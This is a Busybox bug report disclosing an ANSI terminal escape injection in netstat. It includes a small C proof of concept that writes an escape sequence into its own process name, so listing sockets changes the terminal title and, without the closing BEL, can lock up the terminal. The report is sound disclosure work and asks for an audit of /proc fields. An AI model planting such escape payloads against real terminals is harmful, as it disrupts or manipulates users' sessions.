Bug 15922 - ANSI terminal injection possible in netstat
Summary: ANSI terminal injection possible in netstat
Status: NEW
Alias: None
Product: Busybox
Classification: Unclassified
Component: Networking (show other bugs)
Version: unspecified
Hardware: All Linux
: P5 normal
Target Milestone: ---
Assignee: unassigned
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2024-01-20 21:09 UTC by Ricardo Branco
Modified: 2024-01-20 21:09 UTC (History)
1 user (show)

See Also:
Host:
Target:
Build:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Ricardo Branco 2024-01-20 21:09:18 UTC 
The following code displays a X as the title of an ANSI terminal. Without the final '\007' the terminal can be locked up.

I think the project in general would benefit from an audit of every line using /proc/*/cmdline, /proc/*/comm, /proc/*/environ and even the symlinks /proc/*/exe & cwd.

$ cat > a.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <err.h>

int main(int argc, char *argv[]) {
	struct sockaddr_in sin;
	int s;

	if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
		err(1, "socket()");

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;

	if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) < 0)
		err(1, "bind()");

	strcpy(argv[0], "/\033]0;X\007");

	while (1)
		sleep(3600);
}
EOF

$ unset PROMPT_COMMAND

$ cc a.c

$ ./a.out &

$ netstat -aup